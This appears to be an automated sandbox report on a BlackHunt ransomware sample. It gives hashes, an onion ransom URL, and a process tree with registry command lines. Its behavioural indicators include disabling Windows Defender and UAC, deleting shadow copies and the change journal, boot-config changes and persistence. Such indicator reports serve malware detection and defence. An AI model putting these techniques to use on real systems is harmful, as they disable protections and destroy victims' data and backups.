Analysis
-
max time kernel
254s -
max time network
298s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19-01-2024 00:08
Static task
static1
Behavioral task
behavioral1
Sample
8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe
Resource
win10v2004-20231215-en
General
-
Target
8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe
-
Size
707KB
-
MD5
c3ee0d1398060c9dd89eba0bb7f18670
-
SHA1
ebfa3d2f1c878d86a2484844c50b3a3a121a23c5
-
SHA256
8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86
-
SHA512
4c721d84544b53547886d6697e74196f85fd0aff62cf1b8a8d70775cf19dd17195cd25371012aee5fe607dcdcf82dc2e50a644c27dd47ddcaad31dc76a6651b8
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1e8ovnh:6uaTmkZJ+naie5OTamgEoKxLWVWh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 1488 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 928 bcdedit.exe 2780 bcdedit.exe -
Renames multiple (104) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2752 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Y: 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened (read-only) \??\U: 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened (read-only) \??\A: 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened (read-only) \??\N: 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened (read-only) \??\I: 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened (read-only) \??\J: 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened (read-only) \??\L: 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened (read-only) \??\R: 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened (read-only) \??\H: 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened (read-only) \??\G: 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened (read-only) \??\K: 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened (read-only) \??\B: 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened (read-only) \??\M: 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened (read-only) \??\Q: 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened (read-only) \??\O: 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened (read-only) \??\V: 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened (read-only) \??\X: 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\W: 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened (read-only) \??\S: 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened (read-only) \??\Z: 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened (read-only) \??\E: 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened (read-only) \??\T: 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened (read-only) \??\P: 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\#BlackHunt_ReadMe.hta 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\7-Zip\Lang\tk.txt 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_PreComp_MATTE_PAL.wmv 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationRight_ButtonGraphic.png 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\TitleButtonSubpicture.png 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-back-over-select.png 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\DVD Maker\audiodepthconverter.ax 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\DVD Maker\bod_r.TTF 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\#BlackHunt_ReadMe.hta 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\title_stripe.png 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\ParentMenuButtonIconSubpict.png 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\rollinghills.png 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\7-Zip\Lang\et.txt 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_leftarrow.png 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Full\15x15dot.png 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\#BlackHunt_ReadMe.hta 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_image-frame-ImageMask.png 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\#BlackHunt_ReadMe.txt 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\#BlackHunt_ReadMe.hta 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\#BlackHunt_Private.key 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\7-Zip\Lang\ps.txt 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\#BlackHunt_ReadMe.hta 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationRight_ButtonGraphic.png 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\menu_style_default_Thumbnail.png 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\#BlackHunt_ReadMe.hta 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_INTRO_BG.wmv 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_frame-shadow.png 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\VideoWall\#BlackHunt_ReadMe.hta 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\VideoWall\#BlackHunt_Private.key 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File created C:\Program Files\Java\jdk1.7.0_80\#BlackHunt_ReadMe.hta 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\title_trans_notes.wmv 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\#BlackHunt_Private.key 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\#BlackHunt_ReadMe.txt 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\#BlackHunt_Private.key 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File created C:\Program Files\#BlackHunt_ReadMe.txt 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\#BlackHunt_ReadMe.hta 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_Buttongraphic.png 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyScenesBackground_PAL.wmv 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\dtplugin\#BlackHunt_ReadMe.hta 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File created C:\Program Files\DVD Maker\en-US\#BlackHunt_ReadMe.txt 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_rightarrow.png 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File created C:\Program Files\Google\#BlackHunt_ReadMe.hta 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\babypink.png 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\Bear_Formatted_MATTE2_PAL.wmv 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\#BlackHunt_ReadMe.txt 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File created C:\Program Files\DVD Maker\ja-JP\#BlackHunt_Private.key 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyNotesBackground.wmv 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\#BlackHunt_ReadMe.hta 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\huemainsubpicture2.png 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\redmenu.png 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-previous-over-select.png 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File created C:\Program Files\DVD Maker\fr-FR\#BlackHunt_Private.key 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\7-Zip\Lang\fr.txt 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\7-Zip\Lang\ky.txt 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\7-Zip\Lang\ms.txt 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\7-Zip\Lang\nl.txt 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\7-Zip\Lang\mr.txt 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File created C:\Program Files\Java\jdk1.7.0_80\db\lib\#BlackHunt_ReadMe.txt 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\decorative_rule.png 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\#BlackHunt_Private.key 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\#BlackHunt_ReadMe.txt 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\7-Zip\Lang\de.txt 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File opened for modification C:\Program Files\7-Zip\Lang\sq.txt 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\#BlackHunt_Private.key 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1584 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2600 vssadmin.exe 1156 vssadmin.exe 1588 vssadmin.exe 2176 vssadmin.exe 920 vssadmin.exe -
Modifies registry class 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe Token: SeRestorePrivilege 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe Token: SeBackupPrivilege 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe Token: SeTakeOwnershipPrivilege 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe Token: SeAuditPrivilege 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe Token: SeSecurityPrivilege 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe Token: SeIncBasePriorityPrivilege 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe Token: SeBackupPrivilege 2288 vssvc.exe Token: SeRestorePrivilege 2288 vssvc.exe Token: SeAuditPrivilege 2288 vssvc.exe Token: SeBackupPrivilege 2732 wbengine.exe Token: SeRestorePrivilege 2732 wbengine.exe Token: SeSecurityPrivilege 2732 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 640 wrote to memory of 616 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 28 PID 640 wrote to memory of 616 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 28 PID 640 wrote to memory of 616 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 28 PID 640 wrote to memory of 616 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 28 PID 640 wrote to memory of 1084 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 29 PID 640 wrote to memory of 1084 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 29 PID 640 wrote to memory of 1084 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 29 PID 640 wrote to memory of 1084 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 29 PID 640 wrote to memory of 1748 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 30 PID 640 wrote to memory of 1748 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 30 PID 640 wrote to memory of 1748 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 30 PID 640 wrote to memory of 1748 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 30 PID 640 wrote to memory of 1040 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 31 PID 640 wrote to memory of 1040 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 31 PID 640 wrote to memory of 1040 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 31 PID 640 wrote to memory of 1040 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 31 PID 640 wrote to memory of 1936 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 32 PID 640 wrote to memory of 1936 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 32 PID 640 wrote to memory of 1936 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 32 PID 640 wrote to memory of 1936 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 32 PID 1748 wrote to memory of 2812 1748 cmd.exe 38 PID 1748 wrote to memory of 2812 1748 cmd.exe 38 PID 1748 wrote to memory of 2812 1748 cmd.exe 38 PID 1936 wrote to memory of 1920 1936 cmd.exe 40 PID 1936 wrote to memory of 1920 1936 cmd.exe 40 PID 1936 wrote to memory of 1920 1936 cmd.exe 40 PID 1040 wrote to memory of 1140 1040 cmd.exe 39 PID 1040 wrote to memory of 1140 1040 cmd.exe 39 PID 1040 wrote to memory of 1140 1040 cmd.exe 39 PID 616 wrote to memory of 2476 616 cmd.exe 41 PID 616 wrote to memory of 2476 616 cmd.exe 41 PID 616 wrote to memory of 2476 616 cmd.exe 41 PID 1084 wrote to memory of 1368 1084 cmd.exe 42 PID 1084 wrote to memory of 1368 1084 cmd.exe 42 PID 1084 wrote to memory of 1368 1084 cmd.exe 42 PID 640 wrote to memory of 1460 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 44 PID 640 wrote to memory of 1460 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 44 PID 640 wrote to memory of 1460 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 44 PID 640 wrote to memory of 1460 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 44 PID 640 wrote to memory of 2372 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 47 PID 640 wrote to memory of 2372 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 47 PID 640 wrote to memory of 2372 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 47 PID 640 wrote to memory of 2372 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 47 PID 640 wrote to memory of 2044 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 46 PID 640 wrote to memory of 2044 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 46 PID 640 wrote to memory of 2044 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 46 PID 640 wrote to memory of 2044 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 46 PID 640 wrote to memory of 2312 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 48 PID 640 wrote to memory of 2312 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 48 PID 640 wrote to memory of 2312 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 48 PID 640 wrote to memory of 2312 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 48 PID 640 wrote to memory of 2320 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 49 PID 640 wrote to memory of 2320 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 49 PID 640 wrote to memory of 2320 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 49 PID 640 wrote to memory of 2320 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 49 PID 640 wrote to memory of 2432 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 50 PID 640 wrote to memory of 2432 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 50 PID 640 wrote to memory of 2432 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 50 PID 640 wrote to memory of 2432 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 50 PID 640 wrote to memory of 2148 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 147 PID 640 wrote to memory of 2148 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 147 PID 640 wrote to memory of 2148 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 147 PID 640 wrote to memory of 2148 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 147 PID 640 wrote to memory of 3000 640 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe 52 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe"C:\Users\Admin\AppData\Local\Temp\8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:640 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:616 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1084 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1368
-
-
-
